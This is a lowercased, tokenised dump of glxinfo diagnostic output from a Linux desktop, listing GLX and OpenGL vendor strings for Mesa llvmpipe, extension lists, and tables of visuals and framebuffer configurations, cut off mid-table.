/home/gregor/.drirc : no such file or directory . display : :0 screen : 0 direct rendering : yes server glx vendor string : sgi server glx version string : 1.4 server glx extensions : glx_arb_multisample , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_mesa_copy_sub_buffer , glx_intel_swap_event client glx vendor string : mesa project and sgi client glx version string : 1.4 client glx extensions : glx_arb_create_context , glx_arb_create_context_profile , glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_framebuffer_srgb , glx_ext_create_context_es2_profile , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event glx version : 1.4 glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_multithread_makecurrent , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_ext_texture_from_pixmap opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.4 opengl shading language version string : 1.20 opengl extensions : gl_arb_multisample , gl_ext_abgr , gl_ext_bgra , gl_ext_blend_color , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_copy_texture , gl_ext_polygon_offset , gl_ext_subtexture , gl_ext_texture_object , gl_ext_vertex_array , gl_ext_compiled_vertex_array , gl_ext_texture , gl_ext_texture3d , gl_ibm_rasterpos_clip , gl_arb_point_parameters , gl_ext_draw_range_elements , gl_ext_packed_pixels , gl_ext_point_parameters , gl_ext_rescale_normal , gl_ext_separate_specular_color , gl_ext_texture_edge_clamp , gl_sgis_generate_mipmap , gl_sgis_texture_border_clamp , gl_sgis_texture_edge_clamp , gl_sgis_texture_lod , gl_arb_multitexture , gl_ibm_multimode_draw_arrays , gl_ibm_texture_mirrored_repeat , gl_arb_texture_cube_map , gl_arb_texture_env_add , gl_arb_transpose_matrix , gl_ext_blend_func_separate , gl_ext_fog_coord , gl_ext_multi_draw_arrays , gl_ext_secondary_color , gl_ext_texture_env_add , gl_ext_texture_lod_bias , gl_ingr_blend_func_separate , gl_nv_blend_square , gl_nv_light_max_exponent , gl_nv_texgen_reflection , gl_nv_texture_env_combine4 , gl_sun_multi_draw_arrays , gl_arb_texture_border_clamp , gl_arb_texture_compression , gl_ext_framebuffer_object , gl_ext_texture_env_combine , gl_ext_texture_env_dot3 , gl_mesa_window_pos , gl_nv_packed_depth_stencil , gl_nv_texture_rectangle , gl_arb_depth_texture , gl_arb_occlusion_query , gl_arb_shadow , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_mirrored_repeat , gl_arb_window_pos , gl_ext_stencil_two_side , gl_ext_texture_cube_map , gl_nv_fog_distance , gl_apple_packed_pixels , gl_apple_vertex_array_object , gl_arb_draw_buffers , gl_arb_fragment_program , gl_arb_fragment_shader , gl_arb_shader_objects , gl_arb_vertex_program , gl_arb_vertex_shader , gl_ati_draw_buffers , gl_ati_texture_env_combine3 , gl_ati_texture_float , gl_ext_shadow_funcs , gl_ext_stencil_wrap , gl_mesa_pack_invert , gl_mesa_ycbcr_texture , gl_nv_primitive_restart , gl_arb_fragment_program_shadow , gl_arb_half_float_pixel , gl_arb_occlusion_query2 , gl_arb_point_sprite , gl_arb_shading_language_100 , gl_arb_sync , gl_arb_texture_non_power_of_two , gl_arb_vertex_buffer_object , gl_ati_blend_equation_separate , gl_ext_blend_equation_separate , gl_oes_read_format , gl_arb_pixel_buffer_object , gl_arb_texture_compression_rgtc , gl_arb_texture_float , gl_arb_texture_rectangle , gl_ati_texture_compression_3dc , gl_ext_packed_float , gl_ext_pixel_buffer_object , gl_ext_texture_compression_rgtc , gl_ext_texture_mirror_clamp , gl_ext_texture_rectangle , gl_ext_texture_srgb , gl_ext_texture_shared_exponent , gl_arb_framebuffer_object , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_packed_depth_stencil , gl_arb_vertex_array_object , gl_ati_separate_stencil , gl_ati_texture_mirror_once , gl_ext_draw_buffers2 , gl_ext_draw_instanced , gl_ext_gpu_program_parameters , gl_ext_texture_compression_latc , gl_ext_texture_srgb_decode , gl_oes_egl_image , gl_arb_copy_buffer , gl_arb_draw_instanced , gl_arb_half_float_vertex , gl_arb_instanced_arrays , gl_arb_map_buffer_range , gl_arb_texture_rg , gl_arb_texture_swizzle , gl_arb_vertex_array_bgra , gl_ext_separate_shader_objects , gl_ext_texture_swizzle , gl_ext_vertex_array_bgra , gl_nv_conditional_render , gl_amd_draw_buffers_blend , gl_arb_es2_compatibility , gl_arb_draw_buffers_blend , gl_arb_draw_elements_base_vertex , gl_arb_explicit_attrib_location , gl_arb_fragment_coord_conventions , gl_arb_provoking_vertex , gl_arb_sampler_objects , gl_arb_shader_texture_lod , gl_arb_vertex_type_2_10_10_10_rev , gl_ext_provoking_vertex , gl_ext_texture_snorm , gl_mesa_texture_signed_rgba , gl_arb_robustness , gl_arb_texture_storage 96 glx visuals visual x bf lv rg d st colorbuffer sr ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a f gb bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0x021 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x022 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0f2 24 tc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0f3 24 tc 0 32 0 r . . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x0f4 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0f5 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x0f6 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0f7 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x0f8 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x0f9 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x0fa 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x0fb 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x0fc 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x0fd 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x0fe 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0ff 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x100 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x101 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x102 24 tc 0 32 0 r . . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x103 24 tc 0 32 0 r . . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x104 24 tc 0 32 0 r y . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x105 24 tc 0 32 0 r y . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x106 24 tc 0 32 0 r y . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x107 24 tc 0 32 0 r y . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x108 24 tc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x109 24 tc 0 24 0 r . . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x10a 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x10b 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x10c 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x10d 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x10e 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x10f 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x110 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x111 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x112 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x113 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x114 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x115 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x116 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x117 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x118 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x119 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x11a 24 tc 0 24 0 r . . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x11b 24 tc 0 24 0 r . . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x11c 24 tc 0 24 0 r y . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x11d 24 tc 0 24 0 r y . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x11e 24 tc 0 24 0 r y . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x11f 24 tc 0 24 0 r y . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x120 24 dc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x121 24 dc 0 32 0 r . . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x122 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x123 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x124 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x125 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x126 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x127 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x128 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x129 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x12a 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x12b 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x12c 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x12d 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x12e 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x12f 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x130 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x131 24 dc 0 32 0 r . . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x132 24 dc 0 32 0 r . . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x133 24 dc 0 32 0 r y . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x134 24 dc 0 32 0 r y . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x135 24 dc 0 32 0 r y . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x136 24 dc 0 32 0 r y . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x137 24 dc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x138 24 dc 0 24 0 r . . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x139 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x13a 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x13b 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x13c 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x13d 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x13e 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x13f 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x140 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x141 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x142 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x143 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x144 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x145 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x146 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x147 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x148 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x149 24 dc 0 24 0 r . . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x14a 24 dc 0 24 0 r . . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x14b 24 dc 0 24 0 r y . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x14c 24 dc 0 24 0 r y . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x14d 24 dc 0 24 0 r y . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x14e 24 dc 0 24 0 r y . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x061 32 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 144 glxfbconfigs : visual x bf lv rg d st colorbuffer sr ax dp st accumbuffer ms cav id dep cl sp sz l ci b ro r g b a f gb bf th cl r g b a ns b eat -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0x062 24 tc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x063 24 tc 0 32 0 r . . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x064 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x065 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x066 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x067 24 tc 0 32 0 r y . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x068 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x069 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x06a 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x06b 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x06c 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x06d 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x06e 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x06f 24 tc 0 32 0 r . . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x070 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x071 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x072 32 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x073 24 tc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x074 24 tc 0 32 0 r . . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x075 24 tc 0 32 0 r . . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x076 24 tc 0 32 0 r y . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x077 24 tc 0 32 0 r y . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x078 24 tc 0 32 0 r y . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x079 24 tc 0 32 0 r y . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x07a 24 tc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x07b 24 tc 0 24 0 r . . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x07c 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x07d 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x07e 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x07f 24 tc 0 24 0 r y . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x080 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x081 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x082 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x083 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x084 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x085 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x086 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x087 24 tc 0 24 0 r . . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x088 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x089 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x08a 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x08b 24 tc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x08c 24 tc 0 24 0 r . . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x08d 24 tc 0 24 0 r . . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x08e 24 tc 0 24 0 r y . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x08f 24 tc 0 24 0 r y . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x090 24 tc 0 24 0 r y . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x091 24 tc 0 24 0 r y . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x092 0 tc 0 16 0 r . . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x093 0 tc 0 16 0 r . . 5 6 5 0 . . 0 0 0 16 16 16 0 0 0 slow 0x094 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x095 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 16 16 16 0 0 0 slow 0x096 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x097 0 tc 0 16 0 r y . 5 6 5 0 . . 0 0 0 16 16 16 0 0 0 slow 0x098 0 tc 0 16 0 r . . 5 6 5 0 . . 0 24 0 0 0 0 0 0 0 none 0x099 0 tc 0 16 0 r . . 5 6 5 0 . . 0 24 0 16 16 16 0 0 0 slow 0x09a 0 tc 0 16 0 r y . 5 6 5 0 . . 0 24 0 0 0 0 0 0 0 none 0x09b 0 tc 0 16 0 r y . 5 6 5 0 . . 0 24 0 16 16 16 0 0 0 slow 0x09c 0 tc 0 16 0 r y . 5 6 5 0 . . 0 24 0 0 0 0 0 0 0 none 0x09d 0 tc 0 16 0 r y . 5 6 5 0 . . 0 24 0 16 16 16 0 0 0 slow 0x09e 0 tc 0 16 0 r . . 5 6 5 0 . . 0 24 8 0 0 0 0 0 0 none 0x09f 0 tc 0 16 0 r . . 5 6 5 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0a0 0 tc 0 16 0 r y . 5 6 5 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a1 0 tc 0 16 0 r y . 5 6 5 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0a2 0 tc 0 16 0 r y . 5 6 5 0 . . 0 24 8 0 0 0 0 0 0 none 0x0a3 0 tc 0 16 0 r y . 5 6 5 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0a4 0 tc 0 16 0 r . . 5 6 5 0 . . 0 32 0 0 0 0 0 0 0 none 0x0a5 0 tc 0 16 0 r . . 5 6 5 0 . . 0 32 0 16 16 16 0 0 0 slow 0x0a6 0 tc 0 16 0 r y . 5 6 5 0 . . 0 32 0 0 0 0 0 0 0 none 0x0a7 0 tc 0 16 0 r y . 5 6 5 0 . . 0 32 0 16 16 16 0 0 0 slow 0x0a8 0 tc 0 16 0 r y . 5 6 5 0 . . 0 32 0 0 0 0 0 0 0 none 0x0a9 0 tc 0 16 0 r y . 5 6 5 0 . . 0 32 0 16 16 16 0 0 0 slow 0x0aa 24 dc 0 32 0 r . . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0ab 24 dc 0 32 0 r . . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x0ac 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0ad 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x0ae 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 0 0 0 0 0 0 none 0x0af 24 dc 0 32 0 r y . 8 8 8 8 . . 0 0 0 16 16 16 16 0 0 slow 0x0b0 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x0b1 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x0b2 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x0b3 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x0b4 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 0 0 0 0 0 0 0 none 0x0b5 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 0 16 16 16 16 0 0 slow 0x0b6 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0b7 24 dc 0 32 0 r . . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x0b8 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0b9 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x0ba 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 0 0 0 0 0 0 none 0x0bb 24 dc 0 32 0 r y . 8 8 8 8 . . 0 24 8 16 16 16 16 0 0 slow 0x0bc 24 dc 0 32 0 r . . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x0bd 24 dc 0 32 0 r . . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x0be 24 dc 0 32 0 r y . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x0bf 24 dc 0 32 0 r y . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x0c0 24 dc 0 32 0 r y . 8 8 8 8 . . 0 32 0 0 0 0 0 0 0 none 0x0c1 24 dc 0 32 0 r y . 8 8 8 8 . . 0 32 0 16 16 16 16 0 0 slow 0x0c2 24 dc 0 24 0 r . . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x0c3 24 dc 0 24 0 r . . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x0c4 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x0c5 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x0c6 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 0 0 0 0 0 0 none 0x0c7 24 dc 0 24 0 r y . 8 8 8 0 . . 0 0 0 16 16 16 0 0 0 slow 0x0c8 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x0c9 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x0ca 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x0cb 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x0cc 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 0 0 0 0 0 0 0 none 0x0cd 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 0 16 16 16 0 0 0 slow 0x0ce 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0cf 24 dc 0 24 0 r . . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0d0 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0d1 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0d2 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 0 0 0 0 0 0 none 0x0d3 24 dc 0 24 0 r y . 8 8 8 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0d4 24 dc 0 24 0 r . . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x0d5 24 dc 0 24 0 r . . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x0d6 24 dc 0 24 0 r y . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x0d7 24 dc 0 24 0 r y . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x0d8 24 dc 0 24 0 r y . 8 8 8 0 . . 0 32 0 0 0 0 0 0 0 none 0x0d9 24 dc 0 24 0 r y . 8 8 8 0 . . 0 32 0 16 16 16 0 0 0 slow 0x0da 0 dc 0 16 0 r . . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x0db 0 dc 0 16 0 r . . 5 6 5 0 . . 0 0 0 16 16 16 0 0 0 slow 0x0dc 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x0dd 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 16 16 16 0 0 0 slow 0x0de 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 0 0 0 0 0 0 none 0x0df 0 dc 0 16 0 r y . 5 6 5 0 . . 0 0 0 16 16 16 0 0 0 slow 0x0e0 0 dc 0 16 0 r . . 5 6 5 0 . . 0 24 0 0 0 0 0 0 0 none 0x0e1 0 dc 0 16 0 r . . 5 6 5 0 . . 0 24 0 16 16 16 0 0 0 slow 0x0e2 0 dc 0 16 0 r y . 5 6 5 0 . . 0 24 0 0 0 0 0 0 0 none 0x0e3 0 dc 0 16 0 r y . 5 6 5 0 . . 0 24 0 16 16 16 0 0 0 slow 0x0e4 0 dc 0 16 0 r y . 5 6 5 0 . . 0 24 0 0 0 0 0 0 0 none 0x0e5 0 dc 0 16 0 r y . 5 6 5 0 . . 0 24 0 16 16 16 0 0 0 slow 0x0e6 0 dc 0 16 0 r . . 5 6 5 0 . . 0 24 8 0 0 0 0 0 0 none 0x0e7 0 dc 0 16 0 r . . 5 6 5 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0e8 0 dc 0 16 0 r y . 5 6 5 0 . . 0 24 8 0 0 0 0 0 0 none 0x0e9 0 dc 0 16 0 r y . 5 6 